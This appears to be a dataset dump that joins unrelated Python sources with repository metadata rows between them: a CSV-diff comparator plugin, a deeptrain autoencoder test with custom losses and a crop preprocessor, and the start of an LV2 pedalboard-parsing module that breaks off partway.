        return cls(values_a, values_b, col_metrics=col_metrics)

    def __init__(self, values_a, values_b, col_metrics=None):
        self.values_a = values_a
        self.values_b = values_b
        self.col_metrics = col_metrics
        # Combined comparison table; built lazily by calculate().
        self._table = None
        # Whether the values support numeric subtraction; decided in calc_delta().
        self._supports_numeric_delta = None

    @property
    def supports_numeric_delta(self):
        return self._supports_numeric_delta

    def get_table(self):
        """Outer-join the two values frames under a top-level 'a'/'b' column layer."""
        values_frames = {'a': self.values_a, 'b': self.values_b}
        concat_opts = {
            'axis': 'columns',
            'join': 'outer',
            'sort': False,
        }
        df = pd.concat(values_frames, **concat_opts)
        # TODO factor out this dtype assignment?
        # Nullable Int64 keeps row locations intact for rows missing on one side.
        return (df
                .astype({('a', _F.LOC_ORIG_ROW): 'Int64', ('b', _F.LOC_ORIG_ROW): 'Int64'})
                )

    @property
    def table(self):
        return self._table

    def calculate(self):
        """Build the comparison table and return the per-status metrics."""
        self._table = (self.get_table()
                       .pipe(self.calc_change_metrics_base)
                       .pipe(self.calc_delta)
                       .pipe(self.assign_change_status)
                       )
        return self.get_per_status_metrics()

    def calc_change_metrics_base(self, df):
        """Add the elementary boolean comparison columns."""
        df.loc[:, 'is_equal'] = df[('a', _F.CALC)] == df[('b', _F.CALC)]
        df.loc[:, 'is_null_a'] = df[('a', _F.CALC)].isna()
        df.loc[:, 'is_null_b'] = df[('b', _F.CALC)].isna()
        df.loc[:, 'is_null_both'] = df['is_null_a'] & df['is_null_b']
        df.loc[:, 'is_null_any'] = df['is_null_a'] | df['is_null_b']
        return df

    def calc_delta(self, df):
        """Add the numeric delta column (b - a), or NaN if subtraction fails."""
        # here one could add more specific deltas, e.g. depending on dtype or column name (which is self.key)
        # check if datatype is numeric, or try with exceptions?
        # functions to check are: pandas.api.types.is_number etc
        # TODO since we need to know whether we can do numeric calculations or not in several places,
        # we could store this information as an attribute/property
        try:
            delta = df[('b', _F.CALC)] - df[('a', _F.CALC)]
        except TypeError:
            self._supports_numeric_delta = False
            delta = np.nan
        else:
            self._supports_numeric_delta = True
        df.loc[:, 'delta'] = delta
        return df

    def is_value_modified(self, df):
        """Unequal values count as modified; for numeric columns, only beyond a tolerance."""
        epsilon = 1e-6
        if self.supports_numeric_delta:
            return ~df['is_equal'] & (df['delta'].abs() > epsilon)
        return ~df['is_equal']

    def assign_change_status(self, df):
        """Label every row with one of the change statuses."""
        # TODO additional logic here would be e.g. implementing per-field or per-dtype thresholds
        # TODO make this a categorical
        status = pd.Series(_S.unset, index=df.index)
        status[df['is_null_a'] & (~df['is_null_b'])] = _S.added
        status[(~df['is_null_a']) & df['is_null_b']] = _S.deleted
        status[(~df['is_null_any']) & self.is_value_modified(df)] = _S.modified
        status[status == _S.unset] = _S.unchanged
        df.loc[:, 'status'] = status
        return df

    def get_per_status_metrics(self):
        """Collect aggregated (and, where applicable, per-value) metrics per status."""
        m = {}
        for status in [_S.unchanged, _S.added, _S.deleted, _S.modified]:
            m_status = {}
            values_with_status = self._table[lambda d: d['status'] == status]
            has_with_status = len(values_with_status) > 0
            if not has_with_status:
                # this "continue" means that change statuses with no values
                # are not added to the metrics at all (as opposed to having `{count: 0}` or similar)
                # it could possibly be exposed as an option
                # depening on what are the requirements for the schema/structure of the output
                continue
            f_aggregated = self.map_status_function_aggregated[status]
            m_status.update(f_aggregated(values_with_status))
            f_per_value = self.map_status_function_per_value[status]
            if f_per_value is not None:
                per_value_metrics = []
                if has_with_status:
                    per_value_metrics = values_with_status.apply(f_per_value, axis=1).to_list()
                m_status['values'] = per_value_metrics
            m[status] = m_status
        return m

    @property
    def map_status_function_aggregated(self):
        """Per-status functions producing aggregated metrics."""
        return {
            _S.added: self.get_stats_default,
            _S.deleted: self.get_stats_default,
            _S.unchanged: self.get_stats_default,
            _S.modified: self.get_stats_default,
        }

    @property
    def map_status_function_per_value(self):
        """Per-status functions producing per-value metrics (None: skip)."""
        return {
            _S.unchanged: None,
            _S.added: self.get_per_value_added,
            _S.deleted: self.get_per_value_deleted,
            _S.modified: self.get_per_value_modified,
        }

    def get_stats_default(self, values):
        return {'count': len(values)}

    def get_per_value_added(self, value_properties):
        """Per-value metrics for an added value (side "b" only)."""
        return {
            'value': value_properties[('b', _F.ORIG)],
            'loc': {'row': value_properties[('b', _F.LOC_ORIG_ROW)]}
        }

    def get_per_value_deleted(self, value_properties):
        """Per-value metrics for a deleted value (side "a" only)."""
        return {
            'value': value_properties[('a', _F.ORIG)],
            'loc': {'row': value_properties[('a', _F.LOC_ORIG_ROW)]}
        }

    def get_per_value_modified(self, value_properties):
        """Per-value metrics for a modified value: both sides plus the delta."""
        vp = value_properties
        m = {}
        def get_m_for_side(d, side):
            return {
                'original': d[(side, _F.ORIG)],
                'calculated_as': d[(side, _F.CALC)],
                'loc': {
                    'row': d[(side, _F.LOC_ORIG_ROW)]
                }
            }
        m['a'] = get_m_for_side(vp, 'a')
        m['b'] = get_m_for_side(vp, 'b')
        # the key must be ('delta', '') instead of only 'delta'
        # otherwise strange and horrible errors (segmentation faults from numpy/pandas) will occur
        # this could be a pandas bug, so it would be good to investigate this in more detail at some point
        if self.supports_numeric_delta:
            m['delta'] = vp[('delta', '')]
        return m
class CSVPlugin(base.Comparator):
    # NOTE(review): intentionally no class docstring added here: description()
    # returns cls.__doc__ verbatim, so adding one would change that output.

    @staticmethod
    def supports():
        """Return the list of file extensions handled by this comparator."""
        return ['csv']

    @classmethod
    def description(cls):
        """Return the plug-in description (the class docstring, may be None)."""
        return cls.__doc__

    def gen_comparison_pairs(self, a, b):
        """
        Return an iterable of (key, comparison_pair), where comparison_pair is a tuple of (item_a, item_b) with a matching key.

        Keys missing on one side yield None for that side's item.
        """
        # union of the keys of the two records
        # the ordering of the first record takes precedence
        # an alternative option would be to sort them, lexicographically or with a custom criteria
        keys_union = {**a, **b}.keys()
        for key in keys_union:
            yield key, (a.get(key), b.get(key))

    # extra keyword options forwarded to the record object in get_record_columns()
    # NOTE(review): class-level mutable value -- shared by all instances
    record_opts = {}
    # character marking a commented-out line in the CSV file
    comment_char = '#'

    def get_file_metadata(self, src):
        """
        Collect and return file-level metadata.
        Since it's simple, we can do it here rather than in a dedicated class.
        """
        # TODO have to properly decide if Records should be passed a Processor instance or the raw input
        path = Path(src)
        lines = get_lines_frame(path, comment_char=self.comment_char)
        return {
            'path_parent': path.parent,
            'filename': path.name,
            'n_lines': len(lines),
            'n_lines_commented': len(lines[lines['is_comment']]),
            'n_lines_uncommented': len(lines[~lines['is_comment']]),
            'n_chars': lines['content'].str.len().sum(),
        }

    def compare_file(self, src_a, src_b):
        """Compute and return file-level change metrics between the two sources."""
        file_md_a = self.get_file_metadata(src_a)
        file_md_b = self.get_file_metadata(src_b)
        metrics = ChangeMetricsBase('file', file_md_a, file_md_b)
        metrics.calculate()
        return dict(metrics)

    def columns_key_getter(self, col_metadata):
        """Return the key used to match columns between the two tables."""
        # here the only choice is which col metadata property to use
        # "name", "name_header" and "colidx"
        # TODO consider exposing this as a plug-in-level option (or maybe bool flag?)
        return col_metadata['name']

    def get_record_columns(self, *args, **kwargs):
        """
        Return the Record object used to fetch, process and expose for comparison table columns.

        The record is loaded before being returned.
        """
        rec = CSVTableColumnsRecord(*args, comment_char=self.comment_char, **self.record_opts, **kwargs)
        rec.load()
        return rec

    def get_change_metrics_column(self, *args, **kwargs):
        """
        Return the object used to calculate change metrics for table columns.
        """
        return TableColumnChangeMetrics(*args, **kwargs)

    def get_change_metrics_column_values(self, *args, **kwargs):
        """
        Return the object used to calculate change metrics for table column values.
        """
        return TableColumnValuesChangeMetrics.from_column_metrics(*args, **kwargs)

    def compare_table_data(self, src_a, src_b, **kwargs):
        """Compute per-column and per-value change metrics for the table data."""
        metr_table = {
            'columns': {},
            'values_by_column': {},
        }
        rec_a = self.get_record_columns(src_a)
        rec_b = self.get_record_columns(src_b)
        # for each comparison pair of columns from the two tables
        for comp_key, (col_md_a, col_md_b) in self.gen_comparison_pairs(rec_a, rec_b):
            # first, calculate the change metrics for the column as a whole
            metr_single_col = self.get_change_metrics_column(comp_key, col_md_a, col_md_b)
            metr_single_col.calculate()
            # then, calculate the change metrics for the column values
            metr_values = self.get_change_metrics_column_values(metr_single_col)
            metr_values_data = metr_values.calculate()
            # finally, add info about change in values to the column change metrics
            metr_single_col.calculate_from_value_metrics(metr_values.table)
            metr_table['values_by_column'][comp_key] = metr_values_data
            metr_table['columns'][comp_key] = dict(metr_single_col)
        return metr_table

    def compare(self, path_a, path_b, **kwargs):
        """Entry point: compare two CSV files and return all change metrics."""
        # reset; a real value is assigned by get_stats_table()
        self._percent_change = np.nan
        all_metrics = {}
        all_metrics['file'] = self.compare_file(path_a, path_b)
        # col_metrics also contains the value-level metrics as a DataFrame
        # these should be collected separately and merged together in a single table
        all_metrics['table_data'] = self.compare_table_data(path_a, path_b)
        return self.get_processed_metrics(all_metrics)

    def get_processed_metrics(self, metrics):
        """Hook for post-processing the computed metrics; identity by default."""
        return metrics

    def percent_change(self):
        """Return the overall percent change (set by compare()/get_stats_table())."""
        return self._percent_change

    def get_stats_table(self, table_metrics):
        """Build a per-column stats DataFrame and update the overall percent change."""
        all_cols_stats = []
        for colname, col_metrics in table_metrics['columns'].items():
            col_stats = {'name': colname}
            col_stats.update(col_metrics['values'])
            col_stats['status'] = col_metrics['status']
            all_cols_stats.append(col_stats)
        df = pd.DataFrame(all_cols_stats).set_index('name')
        self._percent_change = df['frac_changed'].mean() * 100
        return df

    # default verbosity of stats(); higher values print more detail
    detail_level = 1

    def stats(self, changes, detail_level=None):
        """Print change statistics at the requested level of detail (0..2)."""
        from .util import to_json
        detail_level = detail_level or self.detail_level
        df_table = self.get_stats_table(changes['table_data'])
        if detail_level >= 0:
            # single-number change percentage:
            print(f'percent change: {self.percent_change():04.2f}%')
        if detail_level >= 1:
            with pd.option_context('display.max_columns', None):
                # overview table with per-column statistics for all columns
                print(df_table)
        if detail_level >= 2:
            # complete change data, assumed to be dict-like (with no assumptions on structure)
            out = to_json(changes)
            print(out)
| 31.466667 | 127 | 0.59581 | 28,197 | 0.948245 | 601 | 0.020211 | 2,937 | 0.098769 | 0 | 0 | 7,660 | 0.2576 |
d37adc24277995ed8988a9ffcaca7dbe43d291d6 | 4,223 | py | Python | tests/customs_test.py | Mario-Kart-Felix/deeptrain | 45e066e9aa97c16780682d62250516c7d64d9897 | [
"MIT"
] | 16 | 2020-09-15T14:27:05.000Z | 2021-05-30T09:43:09.000Z | tests/customs_test.py | adbmd/deeptrain | fd412e68e23bce0d9997b0a619a6887ad557067e | [
"MIT"
] | 1 | 2020-09-18T00:44:17.000Z | 2020-09-18T14:06:00.000Z | tests/customs_test.py | adbmd/deeptrain | fd412e68e23bce0d9997b0a619a6887ad557067e | [
"MIT"
] | 3 | 2020-09-17T16:56:28.000Z | 2021-01-30T03:23:31.000Z | # -*- coding: utf-8 -*-
import os
import sys
# ensure `tests` directory path is on top of Python's module search
filedir = os.path.dirname(__file__)
sys.path.insert(0, filedir)
while filedir in sys.path[1:]:
sys.path.pop(sys.path.index(filedir)) # avoid duplication
import pytest
import numpy as np
from copy import deepcopy
from backend import K, AE_CONFIGS, BASEDIR, tempdir, notify, make_autoencoder
from backend import _init_session, _do_test_load, _get_test_names
from deeptrain.util.preprocessors import Preprocessor
from deeptrain.metrics import _standardize, _weighted_loss
#### CONFIGURE TESTING #######################################################
# image dimensions of the test data (MNIST is 28x28 -- see RandCropPreprocessor)
batch_size = 128
width, height = 28, 28
channels = 1
# location of the bundled image test data
datadir = os.path.join(BASEDIR, 'tests', 'data', 'image')
# per-test completion registry, passed to the @notify decorator
tests_done = {}
# copy the shared autoencoder configs so this module can customize them
CONFIGS = deepcopy(AE_CONFIGS)
CONFIGS['model']['batch_shape'] = (batch_size, width, height, channels)
CONFIGS['datagen']['batch_size'] = batch_size
CONFIGS['val_datagen']['batch_size'] = batch_size
def init_session(C, weights_path=None, loadpath=None, model=None):
    """Thin wrapper over `_init_session` with `model_fn` fixed to `make_autoencoder`."""
    session_kwargs = dict(weights_path=weights_path, loadpath=loadpath, model=model)
    return _init_session(C, model_fn=make_autoencoder, **session_kwargs)
def mean_L_error(y_true, y_pred, sample_weight=1, L=1.5):
    """Mean L-norm error metric (numpy backend).

    Computes ``mean(|y_true - y_pred| ** L)`` along the last axis, weighted by
    `sample_weight`. The exponent `L` was previously a hard-coded local
    constant marked "configurable"; it is now a keyword parameter (L=1 -> MAE,
    L=2 -> MSE). The default of 1.5 preserves the original behavior for all
    existing callers.
    """
    y_true, y_pred, sample_weight = _standardize(y_true, y_pred,
                                                 sample_weight)
    err = np.mean(np.abs(y_true - y_pred) ** L, axis=-1)
    return _weighted_loss(err, sample_weight)
def mLe(y_true, y_pred):
    """Mean L-norm error loss (Keras backend), with exponent L = 1.5."""
    exponent = 1.5  # configurable
    abs_err = K.abs(y_true - y_pred)
    return K.mean(K.pow(abs_err, exponent), axis=-1)
def numpy_loader(self, set_num):
    """Load one data set from its .npy path.

    `allow_pickle` is irrelevant here, just for demo.
    """
    path = self._path(set_num)
    return np.load(path, allow_pickle=True)
class RandCropPreprocessor(Preprocessor):
"""2D random crop. MNIST is 28x28, we try 25x25 crops,
e.g. batch[2:27, 3:28]."""
def __init__(self, size, crop_batch=True, crop_labels=False,
crop_same=False):
# length -> (length, length)
# (width, height) -> (width, height)
assert isinstance(size, (tuple, int))
self.size = size if isinstance(size, tuple) else (size, size)
self.crop_batch = crop_batch
self.crop_labels = crop_labels
self.crop_same = crop_same
def process(self, batch, labels):
if self.crop_batch:
(x_start, x_end), (y_start, y_end) = self._make_crop_mask(batch)
batch = batch[:, x_start:x_end, y_start:y_end]
if self.crop_labels:
if not self.crop_same or not self.crop_batch:
(x_start, x_end), (y_start, y_end
) = self._make_crop_mask(labels)
labels = labels[:, x_start:x_end, y_start:y_end]
return batch, labels
def _make_crop_mask(self, data):
_, w, h, *_ = data.shape # (samples, width, height, channels)
x_offset = np.random.randint(0, w - self.size[0])
y_offset = np.random.randint(0, h - self.size[1])
x_start, x_end = x_offset, x_offset + self.size[0]
y_start, y_end = y_offset, y_offset + self.size[1]
return (x_start, x_end), (y_start, y_end)
##############################################################################
@notify(tests_done)
def test_main():
    """End-to-end: train the autoencoder with all custom objects, then reload it."""
    C = deepcopy(AE_CONFIGS)
    # custom Keras loss + cropped input shape
    C['model'].update(loss=mLe, batch_shape=(128, 24, 24, 1))
    # custom loader + random-crop preprocessor for both data generators
    for dg_key in ('datagen', 'val_datagen'):
        C[dg_key].update(data_loader=numpy_loader,
                         preprocessor=RandCropPreprocessor(size=24))
    C['traingen']['custom_metrics'] = {'mLe': mean_L_error}
    with tempdir(C['traingen']['logs_dir']), \
         tempdir(C['traingen']['best_models_dir']):
        tg = init_session(C)
        tg.train()
        _do_test_load(tg, C, init_session)
##############################################################################
# register every test function of this module as "not yet run"
tests_done.update({name: None for name in _get_test_names(__name__)})
# allow running this file's tests directly, without capturing stdout ("-s")
if __name__ == '__main__':
    pytest.main([__file__, "-s"])
| 36.721739 | 78 | 0.604783 | 1,441 | 0.341227 | 0 | 0 | 690 | 0.163391 | 0 | 0 | 893 | 0.211461 |
d37ae81f0414cb447a6f73c440fb58c44f708e36 | 57,410 | py | Python | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 9 | 2017-05-24T09:55:34.000Z | 2020-06-22T03:55:51.000Z | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 97 | 2016-11-17T16:30:35.000Z | 2021-10-09T00:27:56.000Z | pluginsmanager/model/lv2/lilvlib.py | SpotlightKid/PluginsManager | 2dcc9f6a79b48e9c9be82efffd855352fa15c5c7 | [
"Apache-2.0"
] | 3 | 2017-05-21T19:20:38.000Z | 2019-11-04T23:53:59.000Z | """
File copy from https://github.com/moddevices/lilvlib
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------------------------------------
# Imports
import json
import lilv
import os
from math import fmod
# ------------------------------------------------------------------------------------------------------------
# Utilities
def LILV_FOREACH(collection, func):
    """Yield func(item) for every item of a lilv-style collection.

    The collection must expose begin()/get()/next(); iteration stops when
    the iterator handle becomes falsy.
    """
    iterator = collection.begin()
    while iterator:
        current = collection.get(iterator)
        yield func(current)
        iterator = collection.next(iterator)
class NS(object):
    """Lazy URI-namespace helper: ``NS(world, base).foo`` builds (and caches)
    the lilv node for ``base + "foo"``.

    A single trailing underscore is stripped from the attribute name, so
    Python reserved words can be used as e.g. ``type_``.
    """

    def __init__(self, world, base):
        self.world = world
        self.base = base
        self._cache = {}

    def __getattr__(self, attr):
        name = attr[:-1] if attr.endswith("_") else attr
        try:
            return self._cache[name]
        except KeyError:
            node = lilv.Node(self.world.new_uri(self.base + name))
            self._cache[name] = node
            return node
def is_integer(string):
    """Return True if `string` is a base-10 integer, optionally signed.

    Leading/trailing whitespace is ignored. Fixes the previous behavior of
    accepting repeated sign characters (``lstrip("-+")`` stripped any run of
    signs, so e.g. "--5" was wrongly reported as an integer): at most one
    leading '+' or '-' is now allowed.
    """
    s = string.strip()
    if s[:1] in ("+", "-"):  # s[:1] is "" for empty input, so this is safe
        s = s[1:]
    return s.isdigit()
def get_short_port_name(portName):
    """Shorten a port name so it fits in 16 characters.

    Strategy: keep short names unchanged; otherwise cut at the first '/',
    ' (' or ' [' separator, then drop all vowels except a leading one, and
    finally hard-truncate to 16 characters.
    """
    if len(portName) <= 16:
        return portName

    shortened = portName.split("/", 1)[0].split(" (", 1)[0].split(" [", 1)[0].strip()

    if len(shortened) > 16:
        tail = shortened[1:]
        for vowel in "aeiou":
            tail = tail.replace(vowel, "")
        shortened = shortened[0] + tail
        if len(shortened) > 16:
            shortened = shortened[:16]

    return shortened.strip()
# ------------------------------------------------------------------------------------------------------------
def get_category(nodes):
    """Map a plugin's rdf:type nodes to a list of category names.

    MOD's own vocabulary (mod#) takes precedence: if any mod categories are
    found they are returned; otherwise the standard LV2 plugin classes are
    used. First-seen order is preserved and duplicates are removed.
    """
    lv2_category_indexes = {
        'DelayPlugin': ['Delay'],
        'DistortionPlugin': ['Distortion'],
        'WaveshaperPlugin': ['Distortion', 'Waveshaper'],
        'DynamicsPlugin': ['Dynamics'],
        'AmplifierPlugin': ['Dynamics', 'Amplifier'],
        'CompressorPlugin': ['Dynamics', 'Compressor'],
        'ExpanderPlugin': ['Dynamics', 'Expander'],
        'GatePlugin': ['Dynamics', 'Gate'],
        'LimiterPlugin': ['Dynamics', 'Limiter'],
        'FilterPlugin': ['Filter'],
        'AllpassPlugin': ['Filter', 'Allpass'],
        'BandpassPlugin': ['Filter', 'Bandpass'],
        'CombPlugin': ['Filter', 'Comb'],
        'EQPlugin': ['Filter', 'Equaliser'],
        'MultiEQPlugin': ['Filter', 'Equaliser', 'Multiband'],
        'ParaEQPlugin': ['Filter', 'Equaliser', 'Parametric'],
        'HighpassPlugin': ['Filter', 'Highpass'],
        'LowpassPlugin': ['Filter', 'Lowpass'],
        'GeneratorPlugin': ['Generator'],
        'ConstantPlugin': ['Generator', 'Constant'],
        'InstrumentPlugin': ['Generator', 'Instrument'],
        'OscillatorPlugin': ['Generator', 'Oscillator'],
        'ModulatorPlugin': ['Modulator'],
        'ChorusPlugin': ['Modulator', 'Chorus'],
        'FlangerPlugin': ['Modulator', 'Flanger'],
        'PhaserPlugin': ['Modulator', 'Phaser'],
        'ReverbPlugin': ['Reverb'],
        'SimulatorPlugin': ['Simulator'],
        'SpatialPlugin': ['Spatial'],
        'SpectralPlugin': ['Spectral'],
        'PitchPlugin': ['Spectral', 'Pitch Shifter'],
        'UtilityPlugin': ['Utility'],
        'AnalyserPlugin': ['Utility', 'Analyser'],
        'ConverterPlugin': ['Utility', 'Converter'],
        'FunctionPlugin': ['Utility', 'Function'],
        'MixerPlugin': ['Utility', 'Mixer'],
        #'MIDIPlugin': ['MIDI', 'Utility'],
    }
    mod_category_indexes = {
        'DelayPlugin': ['Delay'],
        'DistortionPlugin': ['Distortion'],
        'DynamicsPlugin': ['Dynamics'],
        'FilterPlugin': ['Filter'],
        'GeneratorPlugin': ['Generator'],
        'ModulatorPlugin': ['Modulator'],
        'ReverbPlugin': ['Reverb'],
        'SimulatorPlugin': ['Simulator'],
        'SpatialPlugin': ['Spatial'],
        'SpectralPlugin': ['Spectral'],
        'UtilityPlugin': ['Utility'],
        'MIDIPlugin': ['Utility', 'MIDI'],
    }

    def collect(index, ns_prefix):
        # flatten the per-node category lists, deduping while keeping order
        found = []
        lookup = lambda node: index.get(node.as_string().replace(ns_prefix, ""), [])
        for catlist in LILV_FOREACH(nodes, lookup):
            for cat in catlist:
                if cat not in found:
                    found.append(cat)
        return found

    mod_categories = collect(mod_category_indexes, "http://moddevices.com/ns/mod#")
    if mod_categories:
        return mod_categories
    return collect(lv2_category_indexes, "http://lv2plug.in/ns/lv2core#")
def get_port_data(port, subj):
    """Collect the string values of `port` for predicate `subj` as a list."""
    values = port.get_value(subj.me)
    collected = []
    it = lilv.lilv_nodes_begin(values)
    while not lilv.lilv_nodes_is_end(values, it):
        node = lilv.lilv_nodes_get(values, it)
        it = lilv.lilv_nodes_next(values, it)
        if node is not None:
            collected.append(lilv.lilv_node_as_string(node))
    return collected
def get_port_unit(miniuri):
    """Return (label, render, symbol) for a known lv2 unit mini-URI.

    Unknown units yield three empty strings.
    """
    # using label, render, symbol
    units = {
        's': ["seconds", "%f s", "s"],
        'ms': ["milliseconds", "%f ms", "ms"],
        'min': ["minutes", "%f mins", "min"],
        'bar': ["bars", "%f bars", "bars"],
        'beat': ["beats", "%f beats", "beats"],
        'frame': ["audio frames", "%f frames", "frames"],
        'm': ["metres", "%f m", "m"],
        'cm': ["centimetres", "%f cm", "cm"],
        'mm': ["millimetres", "%f mm", "mm"],
        'km': ["kilometres", "%f km", "km"],
        'inch': ["inches", """%f\"""", "in"],
        'mile': ["miles", "%f mi", "mi"],
        'db': ["decibels", "%f dB", "dB"],
        'pc': ["percent", "%f%%", "%"],
        'coef': ["coefficient", "* %f", "*"],
        'hz': ["hertz", "%f Hz", "Hz"],
        'khz': ["kilohertz", "%f kHz", "kHz"],
        'mhz': ["megahertz", "%f MHz", "MHz"],
        'bpm': ["beats per minute", "%f BPM", "BPM"],
        'oct': ["octaves", "%f octaves", "oct"],
        'cent': ["cents", "%f ct", "ct"],
        'semitone12TET': ["semitones", "%f semi", "semi"],
        'degree': ["degrees", "%f deg", "deg"],
        'midiNote': ["MIDI note", "MIDI note %d", "note"],
    }
    return units.get(miniuri, ("", "", ""))
# ------------------------------------------------------------------------------------------------------------
# get_bundle_dirname
def get_bundle_dirname(bundleuri):
    """Resolve a bundle URI to its directory path.

    Raises IOError if the resolved path does not exist; if it points at a
    file, the containing directory is returned instead.
    """
    path = lilv.lilv_uri_to_path(bundleuri)
    if not os.path.exists(path):
        raise IOError(bundleuri)
    return os.path.dirname(path) if os.path.isfile(path) else path
# ------------------------------------------------------------------------------------------------------------
# get_pedalboard_info
# Get info from an lv2 bundle
# @a bundle is a string, consisting of a directory in the filesystem (absolute pathname).
def get_pedalboard_info(bundle):
    """Describe the pedalboard contained in an LV2 bundle.

    @a bundle is a string, consisting of a directory in the filesystem
    (absolute pathname) holding exactly one plugin with the mod:Pedalboard
    type. Returns a dict with the pedalboard's name/uri/author, hardware
    port counts, canvas size, screenshot/thumbnail filenames, connections
    and plugin blocks. Raises Exception otherwise.

    Fix: the error messages used a '%s' placeholder together with
    str.format(), so the bundle path was never interpolated; they now use
    '{0}' replacement fields.
    """
    # lilv wants the last character as the separator
    bundle = os.path.abspath(bundle)
    if not bundle.endswith(os.sep):
        bundle += os.sep

    # Create our own unique lilv world
    # We'll load a single bundle and get all plugins from it
    world = lilv.World()

    # this is needed when loading specific bundles instead of load_all
    # (these functions are not exposed via World yet)
    lilv.lilv_world_load_specifications(world.me)
    lilv.lilv_world_load_plugin_classes(world.me)

    # convert bundle string into a lilv node
    bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)

    # load the bundle
    world.load_bundle(bundlenode)

    # free bundlenode, no longer needed
    lilv.lilv_node_free(bundlenode)

    # get all plugins in the bundle
    plugins = world.get_all_plugins()

    # make sure the bundle includes 1 and only 1 plugin (the pedalboard)
    if plugins.size() != 1:
        raise Exception('get_pedalboard_info({0}) - bundle has 0 or > 1 plugin'.format(bundle))

    # no indexing in python-lilv yet, just get the first item
    plugin = None
    for p in plugins:
        plugin = p
        break

    if plugin is None:
        raise Exception('get_pedalboard_info({0}) - failed to get plugin, you are using an old lilv!'.format(bundle))

    # define the needed stuff
    ns_rdf      = NS(world, lilv.LILV_NS_RDF)
    ns_lv2core  = NS(world, lilv.LILV_NS_LV2)
    ns_ingen    = NS(world, "http://drobilla.net/ns/ingen#")
    ns_mod      = NS(world, "http://moddevices.com/ns/mod#")
    ns_modpedal = NS(world, "http://moddevices.com/ns/modpedal#")

    # check if the plugin is a pedalboard
    def fill_in_type(node):
        return node.as_string()
    plugin_types = [i for i in LILV_FOREACH(plugin.get_value(ns_rdf.type_), fill_in_type)]

    if "http://moddevices.com/ns/modpedal#Pedalboard" not in plugin_types:
        raise Exception('get_pedalboard_info({0}) - plugin has no mod:Pedalboard type'.format(bundle))

    # let's get all the info now
    ingenarcs   = []
    ingenblocks = []

    info = {
        'name'  : plugin.get_name().as_string(),
        'uri'   : plugin.get_uri().as_string(),
        'author': plugin.get_author_name().as_string() or "", # Might be empty
        'hardware': {
            # we save this info later
            'audio': {
                'ins' : 0,
                'outs': 0
            },
            'cv': {
                'ins' : 0,
                'outs': 0
            },
            'midi': {
                'ins' : 0,
                'outs': 0
            }
        },
        'size': {
            'width' : plugin.get_value(ns_modpedal.width).get_first().as_int(),
            'height': plugin.get_value(ns_modpedal.height).get_first().as_int(),
        },
        'screenshot' : os.path.basename(plugin.get_value(ns_modpedal.screenshot).get_first().as_string() or ""),
        'thumbnail'  : os.path.basename(plugin.get_value(ns_modpedal.thumbnail).get_first().as_string() or ""),
        'connections': [], # we save this info later
        'plugins'    : []  # we save this info later
    }

    # connections
    arcs = plugin.get_value(ns_ingen.arc)
    it = arcs.begin()
    while not arcs.is_end(it):
        arc = arcs.get(it)
        it  = arcs.next(it)

        if arc.me is None:
            continue

        head = lilv.lilv_world_get(world.me, arc.me, ns_ingen.head.me, None)
        tail = lilv.lilv_world_get(world.me, arc.me, ns_ingen.tail.me, None)

        if head is None or tail is None:
            continue

        ingenarcs.append({
            "source": lilv.lilv_uri_to_path(lilv.lilv_node_as_string(tail)).replace(bundle,"",1),
            "target": lilv.lilv_uri_to_path(lilv.lilv_node_as_string(head)).replace(bundle,"",1)
        })

    # hardware ports
    handled_port_uris = []
    ports = plugin.get_value(ns_lv2core.port)
    it = ports.begin()
    while not ports.is_end(it):
        port = ports.get(it)
        it   = ports.next(it)

        if port.me is None:
            continue

        # check if we already handled this port
        port_uri = port.as_uri()
        if port_uri in handled_port_uris:
            continue
        if port_uri.endswith("/control_in") or port_uri.endswith("/control_out"):
            continue
        handled_port_uris.append(port_uri)

        # get types
        port_types = lilv.lilv_world_find_nodes(world.me, port.me, ns_rdf.type_.me, None)

        if port_types is None:
            continue

        portDir  = "" # input or output
        portType = "" # atom, audio or cv

        it2 = lilv.lilv_nodes_begin(port_types)
        while not lilv.lilv_nodes_is_end(port_types, it2):
            port_type = lilv.lilv_nodes_get(port_types, it2)
            it2 = lilv.lilv_nodes_next(port_types, it2)

            if port_type is None:
                continue

            port_type_uri = lilv.lilv_node_as_uri(port_type)

            if port_type_uri == "http://lv2plug.in/ns/lv2core#InputPort":
                portDir = "input"
            elif port_type_uri == "http://lv2plug.in/ns/lv2core#OutputPort":
                portDir = "output"
            elif port_type_uri == "http://lv2plug.in/ns/lv2core#AudioPort":
                portType = "audio"
            elif port_type_uri == "http://lv2plug.in/ns/lv2core#CVPort":
                portType = "cv"
            elif port_type_uri == "http://lv2plug.in/ns/ext/atom#AtomPort":
                portType = "atom"

        if not (portDir or portType):
            continue

        if portType == "audio":
            if portDir == "input":
                info['hardware']['audio']['ins'] += 1
            else:
                info['hardware']['audio']['outs'] += 1
        elif portType == "atom":
            if portDir == "input":
                info['hardware']['midi']['ins'] += 1
            else:
                info['hardware']['midi']['outs'] += 1
        elif portType == "cv":
            if portDir == "input":
                info['hardware']['cv']['ins'] += 1
            else:
                info['hardware']['cv']['outs'] += 1

    # plugins
    blocks = plugin.get_value(ns_ingen.block)
    it = blocks.begin()
    while not blocks.is_end(it):
        block = blocks.get(it)
        it    = blocks.next(it)

        if block.me is None:
            continue

        protouri1 = lilv.lilv_world_get(world.me, block.me, ns_lv2core.prototype.me, None)
        protouri2 = lilv.lilv_world_get(world.me, block.me, ns_ingen.prototype.me, None)

        if protouri1 is not None:
            proto = protouri1
        elif protouri2 is not None:
            proto = protouri2
        else:
            continue

        instance = lilv.lilv_uri_to_path(lilv.lilv_node_as_string(block.me)).replace(bundle,"",1)
        uri      = lilv.lilv_node_as_uri(proto)

        enabled  = lilv.lilv_world_get(world.me, block.me, ns_ingen.enabled.me, None)
        builder  = lilv.lilv_world_get(world.me, block.me, ns_mod.builderVersion.me, None)
        release  = lilv.lilv_world_get(world.me, block.me, ns_mod.releaseNumber.me, None)
        minorver = lilv.lilv_world_get(world.me, block.me, ns_lv2core.minorVersion.me, None)
        microver = lilv.lilv_world_get(world.me, block.me, ns_lv2core.microVersion.me, None)

        ingenblocks.append({
            "instance": instance,
            "uri"     : uri,
